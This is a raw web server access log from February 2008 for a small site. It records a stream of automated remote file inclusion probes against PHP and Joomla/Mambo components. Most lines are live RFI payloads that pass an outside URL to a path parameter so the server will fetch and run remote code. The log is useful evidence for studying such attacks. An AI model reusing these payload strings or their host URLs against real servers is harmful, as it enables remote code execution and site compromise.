216.183.98.30 - - [25/Feb/2008:04:00:54 -0800] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
216.183.98.30 - - [25/Feb/2008:04:00:54 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:04:00:59 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:04:00:59 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:04:01:00 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:04:01:01 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:04:01:02 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
213.193.215.56 - - [25/Feb/2008:04:01:03 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.randdesign.de/ppoint/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
87.101.4.42 - - [25/Feb/2008:04:02:00 -0800] "GET /logs/access_080121.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.101.4.42 - - [25/Feb/2008:04:02:00 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.101.4.42 - - [25/Feb/2008:04:02:01 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:02:02 -0800] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:02:06 -0800] "GET /logs/access_071231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:02:06 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:02:07 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:02:11 -0800] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:02:47 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:02:48 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:02:48 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:03:30 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:04:03:40 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:04:03:44 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:04:04 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
216.183.98.30 - - [25/Feb/2008:04:04:04 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
200.29.0.28 - - [25/Feb/2008:04:04:07 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
72.55.164.143 - - [25/Feb/2008:04:04:18 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:04:46 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:05:23 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:05:24 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:05:24 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:05:24 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:05:34 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:05:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:05:36 -0800] "GET /logs/%3Cwbr%20//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:05:59 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:06:00 -0800] "GET /?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.172.144.57 - - [25/Feb/2008:04:06:00 -0800] "GET /?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:06:01 -0800] "GET /logs/access_071119.log//oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:06:02 -0800] "GET /logs/access_071119.log/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:06:02 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:06:03 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:06:03 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:06:04 -0800] "GET /logs/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:06:08 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:06:08 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:06:08 -0800] "GET /?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:06:08 -0800] "GET /?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:06:09 -0800] "GET /logs/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:06:09 -0800] "GET /logs/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:06:17 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:06:18 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:06:19 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:06:37 -0800] "GET /logs/access_080204.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:06:37 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:06:43 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:07:11 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:07:27 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:08:15 -0800] "GET /logs/access_080127.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:08:30 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:08:31 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:08:31 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.234.116.170 - - [25/Feb/2008:04:08:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
211.234.116.170 - - [25/Feb/2008:04:08:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:09:04 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.30.216.8 - - [25/Feb/2008:04:09:09 -0800] "GET /logs/access_071126.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
87.106.9.138 - - [25/Feb/2008:04:09:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:09:35 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:09:35 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:10:22 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:10:22 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:10:22 -0800] "GET /logs/%3Cwbr%20//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.90.123 - - [25/Feb/2008:04:10:27 -0800] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.90.123 - - [25/Feb/2008:04:10:27 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.90.123 - - [25/Feb/2008:04:10:27 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:10:52 -0800] "GET /logs/access_080204.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:10:52 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:10:53 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.74.120.24 - - [25/Feb/2008:04:11:05 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.74.120.24 - - [25/Feb/2008:04:11:06 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.74.120.24 - - [25/Feb/2008:04:11:06 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [25/Feb/2008:04:11:27 -0800] "GET /logs/access_071112.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [25/Feb/2008:04:11:28 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [25/Feb/2008:04:11:28 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:11:51 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:11:52 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.120.255.114 - - [25/Feb/2008:04:12:05 -0800] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://verificsmtp.com/x/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.142.220.82 - - [25/Feb/2008:04:12:05 -0800] "GET /logs/access_080127.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.161.97.124 - - [25/Feb/2008:04:12:08 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.161.97.124 - - [25/Feb/2008:04:12:15 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3941 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.86.84.203 - - [25/Feb/2008:04:12:23 -0800] "GET /?mosConfig_absolute_path=http://wsteam.net/include.c?? HTTP/1.1" 200 919 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.108.66.202 - - [25/Feb/2008:04:12:35 -0800] "GET /logs/access_071126.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.35.84.213 - - [25/Feb/2008:04:13:44 -0800] "GET /logs/access_080114.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.246.45.200 - - [25/Feb/2008:04:14:04 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.45.200 - - [25/Feb/2008:04:14:05 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.156.10 - - [25/Feb/2008:04:15:05 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:15:23 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.225.221.84 - - [25/Feb/2008:04:15:59 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:17:40 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:17:40 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.246.90.123 - - [25/Feb/2008:04:18:34 -0800] "GET /logs/access_071224.log/components/com_simpleboard/image_upload.php?sbp=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:18:51 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:18:51 -0800] "GET /logs/access_080211.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:18:51 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:18:51 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:19:13 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.45.242.50 - - [25/Feb/2008:04:19:51 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
66.45.242.50 - - [25/Feb/2008:04:19:51 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:04:19:54 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
